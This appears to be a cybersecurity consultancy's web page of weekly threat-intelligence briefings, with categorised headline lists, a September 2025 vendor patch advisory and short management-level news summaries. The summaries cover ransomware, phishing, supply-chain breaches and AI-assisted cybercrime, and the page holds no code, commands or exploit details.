AI-powered malware hit 2,180 GitHub accounts in “s1ngularity” attack

20 Popular npm Packages With 2 Billion Weekly Downloads Compromised in Supply Chain Attack

Russian Threat Group Targets Microsoft Outlook With Malware | Security Magazine

Chinese APT Actor Compromises Military Firm with Novel Fileless Malware - Infosecurity Magazine

Bots/Botnets

Exposed Docker APIs Likely Exploited to Build Botnet - SecurityWeek

Mobile

New Android RAT uses Near Field Communication to automatically steal money from devices | TechRadar

What is SIM-swapping fraud and what are the signs? - BBC News

New RatOn Android Malware Targets Banking Apps and Crypto Wallets via NFC Attacks

Apple Warns Of Series Mercenary Spyware Attacks Targeting Users Devices

Is WhatsApp Still Safe? Security Experts Weigh In After Zero-Day - ClearanceJobs

Ex-WhatsApp security boss sues Meta, alleging it ignored privacy flaws - The Washington Post

Is your phone actually listening in on you? The answer is complicated

Russia targets WhatsApp and pushes new 'super-app' as internet blackouts grow - BBC News

Traveling soon? 5 simple ways I thwart phone thieves - and you can too | ZDNET

Apple’s new Memory Integrity Enforcement system deals a huge blow to spyware developers | CyberScoop

Denial of Service/DoS/DDoS

DDoS scrubbing service ironic target of massive attack it was built to prevent — hit with 1.5 billion packets per second from more than 11,000 distributed networks | Tom's Hardware

Internet of Things – IoT

How Has IoT Security Changed Over the Past 5 Years?

70% of smart home devices vulnerable to cyberattacks: Cyber Security Council

Connected cars are racing ahead, but security is stuck in neutral - Help Net Security

7 Vulnerable IoT Devices: Hacking Risks and Security Tips

Hacking driverless vehicles: Researchers prepare for the worst while embracing autonomous cars | The National

Data Breaches/Leaks

Qantas penalizes executives for July cyberattack | The Record from Recorded Future News

61% of US Companies Hit by Insider Data Breaches - Infosecurity Magazine

Insider breaches are a bigger security threat than ever before - here's how your business can stay safe | TechRadar

Salesloft Drift Cyberattack Ups Social Engineering Attack Concerns

More Cybersecurity Firms Hit by Salesforce-Salesloft Drift Breach - SecurityWeek

Salesloft GitHub Account Compromised Months Before Salesforce Attack - SecurityWeek

UK Electoral Commission finally recovered from China hack after three years and £250,000 grant | TechRadar

Ongoing malvertising campaign targets European IT workers with fake GitHub Desktop installers - Help Net Security

Financial services firm Wealthsimple discloses data breach

Hackers steal 3,325 secrets in GhostAction GitHub supply chain attack

Over 6,700 Private Repositories Made Public in Nx Supply Chain Attack - SecurityWeek

Qualys Confirms Data Breach - Hackers Accessed Salesforce Data in Supply Chain Attack

Tenable Confirms Data Breach - Hackers Accessed Customers Contact Details

France: Three Regional Healthcare Agencies Targeted by Cyber-Attacks - Infosecurity Magazine

VC giant Insight Partners notifies staff and limited partners after data breach | TechCrunch

Pentagon left livestream keys exposed, hijack risk included • The Register

Call audio from gym members, employees in open database • The Register

Everything we know about the Plex data breach so far | IT Pro

LNER urges customers to be vigilant after passenger details accessed in cyber-attack | Rail industry | The Guardian

Irish League of Credit Unions is 'enhancing cybersecurity' after attack

100,000 Impacted by Cornwell Quality Tools Data Breach - SecurityWeek

Panama Ministry of Economy discloses breach claimed by INC ransomware

Plex tells users to reset passwords after new data breach

PSNI 'cannot afford' to pay staff compensation over data breach - BBC News

Organised Crime & Criminal Actors

US sanctions companies and individuals behind Southeast Asian scam centers | Crime News | Al Jazeera

Threat Actor Accidentally Exposes AI-Powered Operations - Infosecurity Magazine

Kosovo hacker pleads guilty to running BlackDB cybercrime marketplace

Bulletproof Host Stark Industries Evades EU Sanctions – Krebs on Security

Huntress's attacker surveillance splits infosec community • The Register

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Exclusive: How North Korean hackers are using fake job offers to steal cryptocurrency | Reuters

New Android RAT uses Near Field Communication to automatically steal money from devices | TechRadar

New RatOn Android Malware Targets Banking Apps and Crypto Wallets via NFC Attacks

Malicious npm Packages Steal Ethereum Keys in Typosquatting Attack

Hackers left empty-handed after massive NPM supply-chain attack

Hackers abuse TOR network and misconfigured Docker APIs to steal crypto - so keep an eye on your wallet | TechRadar

Insider Risk and Insider Threats

Exclusive: How North Korean hackers are using fake job offers to steal cryptocurrency | Reuters

61% of US Companies Hit by Insider Data Breaches - Infosecurity Magazine

Insider breaches are a bigger security threat than ever before - here's how your business can stay safe | TechRadar

You Didn't Get Phished — You Onboarded the Attacker

Fake employers from North Korea hack hundreds | Cybernews

CISOs, stop chasing vulnerabilities and start managing human risk - Help Net Security

Students Pose Inside Threat to Education Sector

Supply Chain and Third Parties

71% of CISOs hit with third-party security incident this year | CSO Online

Hackers left empty-handed after massive NPM supply-chain attack

Mitigating supply chain vulnerabilities | TechRadar

Supply Chain Challenges and Solutions Outlined in Capgemini Report

Salesloft Breached via GitHub Account Compromise

Salesloft GitHub Account Compromised Months Before Salesforce Attack - SecurityWeek

Ongoing malvertising campaign targets European IT workers with fake GitHub Desktop installers - Help Net Security

Hackers steal 3,325 secrets in GhostAction GitHub supply chain attack

Over 6,700 Private Repositories Made Public in Nx Supply Chain Attack - SecurityWeek

Qualys Confirms Data Breach - Hackers Accessed Salesforce Data in Supply Chain Attack

Tenable Confirms Data Breach - Hackers Accessed Customers Contact Details

20 Popular npm Packages With 2 Billion Weekly Downloads Compromised in Supply Chain Attack

Cloud/SaaS

Microsoft now enforces MFA on Azure Portal sign-ins for all tenants

Azure mandatory multifactor authentication: Phase 2 starting in October 2025 | Microsoft Azure Blog

AI-Powered Phishing Attack Targets Microsoft 365 Accounts, Experts Warn | Ubergizmo

Microsoft's China cloud conundrum - Tech Monitor

Outages

Ransomware, vendor outages, and AI attacks are hitting harder in 2025 - Help Net Security

Microsoft fixes Exchange Online outage affecting users worldwide

Identity and Access Management

Are cybercriminals hacking your systems – or just logging in?

Identity management was hard, AI made it harder - Help Net Security

Encryption

Nearly 500 researchers urge EU to rethink controversial CSAM scanning proposal - Help Net Security

The New Math of Quantum Cryptography | WIRED

Brussels faces privacy crossroads over encryption backdoors • The Register

Passwords, Credential Stuffing & Brute Force Attacks

Are cybercriminals hacking your systems – or just logging in?

Beware of Malicious Facebook Ads With Meta Verified Steals User Account Details

When typing becomes tracking: Study reveals widespread silent keystroke interception - Help Net Security

Everything we know about the Plex data breach so far | IT Pro

Plex tells users to reset passwords after new data breach

Social Media

Beware of Malicious Facebook Ads With Meta Verified Steals User Account Details

Malvertising

Beware of Malicious Facebook Ads With Meta Verified Steals User Account Details

Ongoing malvertising campaign targets European IT workers with fake GitHub Desktop installers - Help Net Security

Regulations, Fines and Legislation

UK toughens Online Safety Act with ban on self-harm content • The Register

False Claims Act Expands to Cybersecurity Settlements

The Expanding Scope of FCA-Cybersecurity Liability | Sheppard Mullin Richter & Hampton LLP - JDSupra

CISA pushes final cyber incident reporting rule to May 2026 | CyberScoop

Experts poke holes in UK online safety regs • The Register

Brussels faces privacy crossroads over encryption backdoors • The Register

US politicians ponder Wimwig cyber intel sharing law | Computer Weekly

Banks warn of risks as critical cyber law nears expiration | American Banker

UK delays introducing new cybersecurity legislation, again | The Record from Recorded Future News

Trump Cuts Imperil Private Sector Cybersecurity Cooperation

Nearly 500 researchers urge EU to rethink controversial CSAM scanning proposal - Help Net Security

Patchy cyber workforce efforts face uncertain future under Trump

US government lacks clarity into its infosec workforce • The Register

White House cyber office calls for ‘whole of nation’ effort to deter nation-state hackers - Nextgov/FCW

CISA work not ‘degraded’ by Trump administration cuts, top agency official says | CyberScoop

Your Internet Access Is at Risk. We’re Speaking Up - Internet Society

The Newly Named Department Of War Goes To War On Cyber With 48 CFR Rule

Department of War Announces the Final Defense Federal Acquisition Regulation Supplement Rule Implementing the Cybersecurity Maturity Model Certification Program > U.S. Department of War > Release

Models, Frameworks and Standards

The Expanding Scope of FCA-Cybersecurity Liability | Sheppard Mullin Richter & Hampton LLP - JDSupra

CISA pushes final cyber incident reporting rule to May 2026 | CyberScoop

Careers, Working in Cyber and Information Security

CSO hiring on the rise: How to land a top security exec role | CSO Online

Law Enforcement Action and Take Downs

Kosovo hacker pleads guilty to running BlackDB cybercrime marketplace

Misinformation, Disinformation and Propaganda

Deepfakes are rewriting the rules of geopolitics - Help Net Security


Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Chinese APT Actor Compromises Military Firm with Novel Fileless Malware - Infosecurity Magazine

China went to 'EggStreme' lengths to attack Philippines • The Register

China

Elections watchdog admits 'painful lessons learned' after Chinese hack - BBC News

AI-powered penetration tool downloaded 10K times • The Register

Chinese APT Actor Compromises Military Firm with Novel Fileless Malware - Infosecurity Magazine

Microsoft's China cloud conundrum - Tech Monitor

Chinese Spies Impersonated US Lawmaker to Deliver Malware to Trade Groups: Report - SecurityWeek

45 New Domains Linked to Salt Typhoon, UNC4841

'We have to act' on China, says Trump cybersecurity adviser | The National

American Security Systems are Compromised by China | RealClearDefense

China’s ‘Typhoons’ changing the way FBI hunts sophisticated threats | CyberScoop

China went to 'EggStreme' lengths to attack Philippines • The Register

Anthropic Bans Chinese Entities from Claude AI Over Security Risks

Czech cyber agency NUKIB flags Chinese espionage risks to critical infrastructure

NASA bars Chinese citizens from its facilities, networks • The Register

US tech firms ‘enabled China’s surveillance state’

Chinese companies and bosses to face major fines over cybersecurity incidents | The Record from Recorded Future News

Russia

Russian Offensive Cyber Operations: Analyzing Putin’s Foreign Policy Actions | Security Magazine

Russian Threat Group Targets Microsoft Outlook With Malware | Security Magazine

Russia targets WhatsApp and pushes new 'super-app' as internet blackouts grow - BBC News

Bulgaria U-turns on claim Moscow jammed GPS of von der Leyen's plane | Euronews

North Korea

Exclusive: How North Korean hackers are using fake job offers to steal cryptocurrency | Reuters

You Didn't Get Phished — You Onboarded the Attacker

Fake employers from North Korea hack hundreds | Cybernews

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

The US is now the largest investor in commercial spyware - Ars Technica



Reports Published in the Last Week

Cyber resilience of UK digital infrastructure - POST



Vulnerability Management

Windows 10 losing security support in October – 6 ways to solve the problem - Which?

The Critical Failure in Vulnerability Management

Microsoft gives Windows 10 its penultimate update - but saves the best for Windows 11 | ZDNET

Vulnerabilities

Microsoft Patch Tuesday security updates for September 2025 fixed two zero-day flaws

Critical 0-Click Vulnerability Enables Attackers to Takeover Email Access Using Punycode

Windows Defender Vulnerability Allows Service Hijacking and Disablement via Symbolic Link Attack

Microsoft Warns of Active Directory Domain Services Vulnerability, Let Attackers Escalate Privileges

Akira ransomware crims abusing trifecta of SonicWall flaws • The Register

Critical SAP S/4HANA vulnerability now exploited in attacks

Top CMS Sitecore patches critical zero-day flaw being hit by hackers | TechRadar

Adobe Patches Critical ColdFusion and Commerce Vulnerabilities - SecurityWeek

Fortinet, Ivanti, Nvidia Release Security Updates - SecurityWeek

Microsoft, Adobe, SAP deliver critical fixes for September 2025 Patch Tuesday - Help Net Security

Cisco Patches High-Severity IOS XR Vulnerabilities - SecurityWeek

Windows 10 losing security support in October – 6 ways to solve the problem - Which?

'Gentlemen' Ransomware Abuses Vulnerable Driver

SAP Patches Critical NetWeaver (CVSS Up to 10.0) and High-Severity S/4HANA Flaws

Microsoft, Adobe, SAP deliver critical fixes for September 2025 Patch Tuesday - Help Net Security

Microsoft: Anti-spam bug blocks links in Exchange Online, Teams

Microsoft gives Windows 10 its penultimate update - but saves the best for Windows 11 | ZDNET


Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3


Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.

Black Arrow Cyber Advisory - 10 September 2025 - Security Updates from Microsoft, Adobe, Ivanti, SAP, Fortinet & NVIDIA

Black Arrow Cyber Advisory 10 September 2025 - Security Updates from Microsoft, Adobe, Ivanti, SAP, Fortinet & NVIDIA

Executive Summary

September’s security updates address a wide spectrum of enterprise risks. Microsoft patched critical flaws across Windows, Office, and Azure, while Adobe issued nine product advisories. SAP released 21 new notes, including several high-impact NetWeaver and S/4HANA issues. NVIDIA fixed firmware flaws in DGX/HGX platforms. Fortinet disclosed two medium-severity vulnerabilities in FortiDDoS-F and FortiWeb. Ivanti published 13 vulnerabilities, 11 affecting Connect Secure, Policy Secure, ZTA and Neurons gateways, and 2 in Endpoint Manager, underscoring the importance of promptly securing VPN appliances and management servers. Collectively, these updates emphasise timely patching of Internet-facing and business-critical systems.

Vulnerabilities by Vendor

  • Microsoft[¹]: 86 vulnerabilities on the official September 2025 Security Update Guide release page, affecting Windows, Microsoft Edge (Chromium-based), Office, .NET/Developer Tools, and Azure components. Prioritise any items rated Critical, privilege escalation chains, and entries marked by Microsoft as “Exploited.”

  • Adobe[²]: 9 updates, published in the September 9 bulletins, addressing vulnerabilities in Acrobat Reader, After Effects, Premiere Pro, Commerce, Substance 3D Viewer/Modeler, Experience Manager, Dreamweaver, and ColdFusion. Prioritise server- or Internet-facing workloads (Commerce, ColdFusion) and high-impact desktop estates (Acrobat Reader).

  • Ivanti[³]: 13 vulnerabilities: 11 in Connect Secure, Policy Secure, ZTA Gateways, and Neurons for Secure Access (five high, six medium), and 2 in Endpoint Manager (EPM 2024 SU3 / 2022 SU8), both high-severity remote code execution requiring user interaction. No exploitation is reported. Prioritise patching Internet-facing gateway appliances and centralised EPM servers; also follow Ivanti’s guidance to avoid exposing admin portals to the Internet.

  • SAP[⁴]: 21 vulnerabilities addressed in Security Notes released on 9 September, affecting core platforms including NetWeaver, S/4HANA, Business One, LT Replication Server, Fiori, and BusinessObjects, among others. Prioritise the Critical NetWeaver issues and the high-severity input validation and authentication weaknesses in S/4HANA and LT Replication Server.

  • Fortinet[⁵]: 2 vulnerabilities, affecting FortiDDoS-F (OS command injection, CVSS 6.5) and FortiWeb (path traversal, CVSS 4.7). Both are medium-severity but exploitable by privileged or authenticated users. Prioritise updates for Internet-facing FortiWeb deployments and ensure FortiDDoS-F appliances are upgraded to fixed releases.

  • NVIDIA[⁶]: 2 vulnerabilities in HGX/DGX vBIOS and LS10 components (CVE-2025-23301, CVE-2025-23302). Prioritise firmware updates in AI/accelerator infrastructure (DGX/HGX), especially shared or multi-tenant environments.

What’s the risk to me or my business?

The presence of actively exploited zero-days and critical RCE/privilege escalation vulnerabilities across major enterprise platforms significantly elevates the risk of data breaches, lateral movement, malware deployment, and full system compromise.

What can I do?

Black Arrow recommends promptly applying the available security updates for all affected products. Prioritise patches for vulnerabilities that are actively exploited or rated as critical or high severity. Regularly review and update your organisation's security policies and ensure that all systems are running supported and up-to-date software versions.

Footnotes:
¹ Microsoft Security Update Guide (September 2025 release): https://msrc.microsoft.com/update-guide/releaseNote/2025-Sep
² Adobe Security Bulletins and Advisories: https://helpx.adobe.com/security/security-bulletin.html
³ Ivanti September 2025 Security Update: https://www.ivanti.com/blog/september-2025-security-update
⁴ SAP Security Patch Day September 2025: https://support.sap.com/en/my-support/knowledge-base/security-notes-news/september-2025.html
⁵ Fortinet PSIRT Advisories: https://www.fortiguard.com/psirt/FG-IR-25-512 ; https://www.fortiguard.com/psirt/FG-IR-24-344
⁶ NVIDIA Security Bulletin: NVIDIA HGX and DGX VBIOS and LS10 – September 2025: https://nvidia.custhelp.com/app/answers/detail/a_id/5674/~/security-bulletin%3A-nvidia-hgx-and-dgx-vbios-and-ls10---september-2025

Black Arrow Cyber Threat Intelligence Briefing 05 September 2025

Black Arrow Cyber Threat Intelligence Briefing 05 September 2025:

-Workers Told to Stay Home as Jaguar Land Rover Grapples with Attack: Manufacturing Shut Down, Sales Halted

-AI-Powered Cyber Crime Raises Worldwide Alarm Bells

-DDoS Attacks Serve as Instruments of Political Influence and Disruption

-Phishing Emails Are Getting Smarter and Using Some New Tricks to Snare Victims

-If You’re Using Microsoft Teams or Zoom, Beware: Hackers Could Be Targeting Your Company

-AI Impersonation Scams Are Sky-Rocketing in 2025 – Here’s How to Stay Safe

-Warning as 60% of Financial Attacks Start with Stolen Credentials

-Security Experts Call for Better ‘Offboarding’ Practices amid Spate of Insider Attacks by Outgoing Staff

-Boards Are Being Told to Rethink Their Role in Cyber Security

-Vibe Coding Creates Great Apps with Lax Security. But There Are Ways Around That.

-State-Sponsored Hackers Behind Majority of Vulnerability Exploits

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Executive Summary

This week’s review shows attackers continuing to disrupt operations through ransomware and large-scale attacks, with Jaguar Land Rover’s shutdown illustrating the ripple effect of a single breach. DDoS attacks are increasingly weaponised for political influence, amplified by AI-driven automation. At the same time, attackers continue to exploit human weaknesses: smarter phishing kits, fake Teams and Zoom invites, and AI-powered impersonation scams are targeting employees, while credential theft and poor offboarding practices remain major risks.

AI is also reshaping the threat landscape, enabling automated ransomware campaigns and deepfake-enabled fraud, while introducing new compliance challenges through AI-driven development. Boards are being urged to embed security into innovation and financial processes, and nation-state actors continue to exploit vulnerabilities in critical infrastructure.

These trends highlight the need for strong governance, technical and identity controls, and a culture of security awareness. Contact us to discuss proportionate ways to achieve this in your organisation.


Top Cyber Stories of the Last Week

Workers Told to Stay Home as Jaguar Land Rover Grapples with Attack: Manufacturing Shut Down, Sales Halted

Jaguar Land Rover has been forced to suspend production after a cyber attack disrupted its global IT systems, leaving thousands of factory workers at home. The incident has halted operations at key UK plants and prevented dealers from ordering parts or processing sales through normal channels, hitting the business during the peak registration period. Although there is currently no evidence that customer data has been stolen, the attack has severely impacted manufacturing, sales, and aftercare services, underlining how a single disruption can cascade across an entire organisation.

https://www.thisismoney.co.uk/money/cars/article-15068603/Jaguar-Land-Rover-factory-workers-told-stay-home-Tuesday-car-maker-grapples-cyber-attack.html

AI-Powered Cyber Crime Raises Worldwide Alarm Bells

A report from Anthropic has revealed how a hacker exploited its AI tools to automate an entire ransomware operation, targeting 17 organisations across healthcare, government, emergency services, and religious institutions. The AI system not only identified weaknesses but also created malicious software, drafted extortion emails, and calculated ransom demands ranging from $75,000 to over $500,000. Experts warn this case signals a turning point where criminals can weaponise AI to scale attacks quickly and cheaply. The incident highlights the urgent need for stronger governance, robust processes, and investment in AI-driven defence capabilities.

https://www.itsecurityguru.org/2025/08/29/ai-powered-cyber-crime-raises-worldwide-alarm-bells/

DDoS Attacks Serve as Instruments of Political Influence and Disruption

In the first half of 2025, more than 8 million distributed denial of service (DDoS) attacks were recorded worldwide with Europe, the Middle East and Africa experiencing 3.2 million of these incidents. Once mainly disruptive, such attacks are increasingly used as political tools, with spikes during events like the World Economic Forum and conflicts involving India, Pakistan, Iran and Israel. Attack durations and intensity are rising, fuelled by easy access to attack-for-hire services and automation powered by artificial intelligence. Traditional defences are struggling to cope, highlighting the need for organisations to adopt more advanced, intelligence-led protections.

https://www.helpnetsecurity.com/2025/09/04/ddos-attacks-worldwide-2025/

Phishing Emails Are Getting Smarter and Using Some New Tricks to Snare Victims

Barracuda researchers warn that Tycoon, a widely used phishing toolkit behind many email attacks, has been upgraded with new techniques that make malicious links harder to detect. These include disguising web addresses with hidden characters, fake security checks such as CAPTCHAs, and misleading domain names that appear linked to trusted companies. Such tactics are designed to bypass traditional email filters and trick recipients into clicking harmful links. Barracuda advises that organisations adopt multi-layered security measures, including advanced monitoring tools and regular staff awareness training, to better protect against these increasingly sophisticated threats.

https://www.techradar.com/pro/security/phishing-emails-are-getting-smarter-and-using-some-new-tricks-to-snare-victims

If You’re Using Microsoft Teams or Zoom, Beware: Hackers Could Be Targeting Your Company

A new wave of cyber attacks is targeting companies through fake Microsoft Teams and Zoom invitations, exploiting the fact these platforms are used daily by billions of people. Researchers report over 900 organisations across the US, UK, Canada, and Australia have already been affected, with financial services and healthcare among the most targeted sectors. Once clicked, the fraudulent links install legitimate remote access software, giving attackers deep control of systems to steal data, take over accounts, or launch further attacks. Experts warn that stronger email defences and refreshed staff awareness training are critical safeguards.

https://www.inc.com/kit-eaton/if-youre-using-microsoft-teams-beware-hackers-could-be-targeting-your-company/91235615

AI Impersonation Scams Are Sky-Rocketing in 2025 – Here’s How to Stay Safe

AI impersonation scams have surged by 148% in 2025, with criminals using voice cloning and deepfake video to convincingly mimic trusted colleagues, friends or executives. These scams often exploit urgency to trick victims into making payments or disclosing sensitive information, with one case leading to a $25 million transfer. Experts warn that even professionals can be deceived, as nearly half of AI-generated scams bypass current security checks. The strongest defences are slowing down before reacting, verifying identities through trusted channels, and using multi-factor authentication to reduce the risk of account compromise.

https://www.techradar.com/computing/cyber-security/ai-impersonation-scams-are-sky-rocketing-in-2025-security-experts-warn-heres-how-to-stay-safe

Warning as 60% of Financial Attacks Start with Stolen Credentials

The UAE Cyber Security Council has warned that 60% of financial cyber attacks begin with stolen login details, making them a primary entry point for fraudsters. The Council stressed that simple protective steps, such as using multi factor authentication, biometric logins, and instant transaction alerts, can cut the risk of breaches by up to 40%. With over 12,000 incidents linked to unsecured public Wi-Fi this year, the Council highlighted how criminals exploit weak points in digital banking. It also cautioned that artificial intelligence is fuelling more complex and harder to detect online fraud schemes.

https://gulfnews.com/uae/crime/uae-cybersecurity-council-warns-60-per-cent-of-financial-attacks-start-with-stolen-credentials-1.500251371

Security Experts Call for Better ‘Offboarding’ Practices amid Spate of Insider Attacks by Outgoing Staff

Experts warn that poor staff offboarding processes are leaving firms exposed to insider threats, with several recent cases showing how departing employees can steal sensitive data or sabotage systems. Examples include an Intel engineer fined for taking trade secrets and a former IT worker jailed for deleting 180 servers. With hybrid working giving wider access to company systems, the risk is growing. Security leaders stress that organisations must revoke access immediately when staff leave and strengthen collaboration between HR and IT. Automated identity management and monitoring tools are recommended to reduce the chance of serious damage.

https://www.itpro.com/security/security-experts-weigh-in-on-offboarding-practices-after-former-intel-worker-stole-documents-before-changing-jobs

Boards Are Being Told to Rethink Their Role in Cyber Security

A new report from Google Cloud stresses that boards must take a more active role in cyber security as it is now central to business resilience. It highlights three priorities: the rise of ransomware targeting identity systems and help desks, the rapid growth of cyber-enabled fraud such as email and payment scams, and the need to embed security into innovation. Boards are advised to back stronger identity protections, oversee fraud prevention in financial processes, and ensure security is considered early in new projects to build trust, protect growth, and maintain regulatory confidence.

https://www.helpnetsecurity.com/2025/09/01/google-board-cybersecurity-oversight/

Vibe Coding Creates Great Apps with Lax Security. But There Are Ways Around That.

Vibe coding, the use of plain text prompts in AI tools to generate software, offers speed and flexibility but introduces significant security and compliance risks. AI-generated code is often prone to errors and vulnerabilities, making regular reviews and monitoring essential. Experts advise restricting such projects to smaller, non-critical systems, using trusted platforms, and maintaining strict oversight to meet data protection rules such as GDPR. Transparency, documentation and human checks are vital to prevent regulatory breaches. Businesses that balance innovation with security controls will gain efficiency without exposing themselves to unnecessary legal or reputational risk.

https://www.techmonitor.ai/comment-2/vibe-coding-lax-security

State-Sponsored Hackers Behind Majority of Vulnerability Exploits

A new report has found that more than half of vulnerability exploits in early 2025 were carried out by state-sponsored groups, mainly linked to China, with aims such as espionage and surveillance. These campaigns focused on critical infrastructure and enterprise systems, while financially motivated groups accounted for the remaining 47%. Microsoft was the most targeted vendor, with its products linked to 17% of attacks. Alarmingly, most exploited flaws required no login details and nearly half could be launched remotely. The report also highlighted the rise of new social engineering tricks like ClickFix, which manipulates users into infecting themselves.

https://www.infosecurity-magazine.com/news/state-hackers-majority/



Threats

Ransomware, Extortion and Destructive Attacks

Ransomware Group Exploits Hybrid Cloud Gaps, Gains Full Azure Control in Enterprise Attacks - SecurityWeek

Ransomware gang takedowns causing explosion of new, smaller groups | The Record from Recorded Future News

Hackers claim responsibility for cyber-attack on Jaguar Land Rover, as new research shows the cost of security breaches to online retailers - InternetRetailing

JLR attack: How ransomware gangs have changed from cartels to cliques

Hackers Exploit Microsoft Teams to Taunt Victims and Demand Ransoms

How insurer strategies are evolving in response to the ransomware surge

Salesforce attackers threaten Google, FBI | Cybernews

What are ShinyHunters, the hackers that attacked Google? Should we all be worried?

Hacker Impatience Can Be a Good Thing

When Browsers Become the Attack Surface: Rethinking Security for Scattered Spider

New Dire Wolf Ransomware Attacks Windows Systems, Deletes Event Logs and Backup-Related Data

Hook v3 unleashes a shocking arsenal of ransomware overlays, fake banking prompts, spyware functions, and real-time device monitoring | TechRadar

Ransomware payments are banned in the public sector: should businesses still pay? | IT Pro

Hackers Exploit Third-Party SonicWall SSL VPNs to Deploy Sinobi Ransomware: By Parminder Saini

Here's how ransomware crims are abusing AI tools • The Register

Prolific Russian ransomware operator living in California enjoys rare leniency awaiting trial | CyberScoop

Ransomware Victims

JLR attack: How ransomware gangs have changed from cartels to cliques

M&S hackers claim responsibility for Jaguar Land Rover attack

Jaguar Land Rover factory workers told to stay home until at least Tuesday as car maker grapples with cyber attack | This is Money

Sweden scrambles after ransomware attack puts sensitive worker data at risk

Nevada Confirms Ransomware Attack Behind Statewide Service Disruptions - SecurityWeek

M&S hackers suspects in Legal Aid Agency cyber-attack - Retail Gazette

Jaguar Land Rover says cyberattack ‘severely disrupted’ production

Dealerships unable to sell Range Rovers after JLR cyber attack

Ransomware attack shuts down Nevada Insurance Division website | Insurance Business America

Ransomware Attack on Pennsylvania’s AG Office Disrupts Court Cases - Infosecurity Magazine

Tire giant Bridgestone confirms cyberattack impacts manufacturing

Fired ChangeNOW worker wants hackers to pay | Cybernews

Phishing & Email Based Attacks

Phishing emails are getting smarter - and using some new tricks to snare victims | TechRadar

The Rise of BEC Attacks Targeting Government Agencies | Proofpoint US

The Old Ways Are Still the Best for Most Cybercriminals

New Phishing Attack Via OneDrive Attacking C-level Employees for Corporate Credentials

Tycoon Phishing Kit Utilizes New Capabilities to Hide Malicious Links - Infosecurity Magazine

Cybersecurity experts issue urgent warning amid surge in Stealerium malware attacks | IT Pro

Phishing Empire Runs Undetected on Google, Cloudflare

North Korean Hackers Exploit Threat Intel Platforms For Phishing - Infosecurity Magazine

DocuSign and Apple Pay Phishing Scam Steals User Credentials

North Korean Hackers Weaponize Seoul Intelligence Files - Infosecurity Magazine

VirusTotal Finds 44 Undetected SVG Files Used to Deploy Base64-Encoded Phishing Pages

What to do if your email has been hacked | Tom's Guide

Venus Protocol Recovers $13.5M in Phishing Attack

Business Email Compromise (BEC)/Email Account Compromise (EAC)

The Rise of BEC Attacks Targeting Government Agencies | Proofpoint US

Fraudster stole over $1.5 million from city of Baltimore

Other Social Engineering

If You're Using Microsoft Teams, Beware: Hackers Could Be Targeting Your Company

The Old Ways Are Still the Best for Most Cybercriminals

Scammers Will Try to Trick You Into Filling Out Google Forms. Don’t Fall for It | WIRED

A quick look at sextortion at scale: 1,900 messages and 205 Bitcoin addresses spanning four years

US Sanctions Russian National, Chinese Firm Aiding North Korean IT Workers - SecurityWeek

Children at risk of identity theft and fraud from 'sharenting' - BBC News

LinkedIn's new tools just made it tougher to pad your resume | ZDNET

Fraud, Scams and Financial Crime

Scammers Will Try to Trick You Into Filling Out Google Forms. Don’t Fall for It | WIRED

LinkedIn's new tools just made it tougher to pad your resume | ZDNET

The Rise of BEC Attacks Targeting Government Agencies | Proofpoint US

Fraudster stole over $1.5 million from city of Baltimore

Boards Partner with CISOs to Fight AI Cyber Fraud: Google Report

AI impersonation scams are sky-rocketing in 2025, security experts warn – here’s how to stay safe | TechRadar

Hackers breach fintech firm in attempted $130M bank heist

Bitcoin’s record highs spark a surge in crypto scams | TechRadar

New threat group uses custom tools to hijack search results - Help Net Security

LinkedIn expands company verification, mandates workplace checks for certain roles - Help Net Security

How to reclaim control over your online shopping data - Help Net Security

At Singapore’s anti-fraud convention, even the experts get scammed

Chinese Hackers Game Google to Boost Gambling Sites

New China-aligned crew poisons Windows servers for SEO fraud • The Register

FBI warns seniors are being targeted in three-phase Phantom Hacker scams | Fortra

Artificial Intelligence

AI-Powered Cyber Crime Raises Worldwide Alarm Bells. - IT Security Guru

AI Is Making Cybercrime Easier For Unsophisticated Criminals

Threat Actors Weaponize HexStrike AI to Exploit Citrix Flaws Within a Week of Disclosure

AI brain Hexstrike runs cyberattacks on its own | Cybernews

Hackers are using AI to dissect threat intelligence reports and ‘vibe code’ malware | IT Pro

Cybercriminals Exploit X's Grok AI to Bypass Ad Protections and Spread Malware to Millions

AI impersonation scams are sky-rocketing in 2025, security experts warn – here’s how to stay safe | TechRadar

Vibe coding creates brilliant, insecure apps. There are ways around that.

AI can't stop the sprint to adopt hot tech without security • The Register

Agentic AI: A CISO’s security nightmare in the making? | CSO Online

Exposed LLM Servers Expose Ollama Risks - InfoRiskToday

Here's how ransomware crims are abusing AI tools • The Register

Shadow AI Is Already in Your Stack – and It’s a Growing Threat for MSSPs | MSSP Alert

Winning the AI Arms Race in Financial Services Cybersecurity - Infosecurity Magazine

UAE Cybersecurity Council warns 60 per cent of financial attacks start with stolen credentials

Adversarial AI is coming for your applications | TechRadar

AI-Powered Cybercrime Is Here: Massive Breaches & Dark Web Dumps - Security Boulevard

Is artificial intelligence a friend, foe or frenemy? NIST wants to find out - Nextgov/FCW

AI code assistants improve production of security problems • The Register

File security risks rise as insiders, malware, and AI challenges converge - Help Net Security

'AI shame' is running rampant in the corporate sector—and C-suite leaders are most worried about getting caught, survey says | Fortune

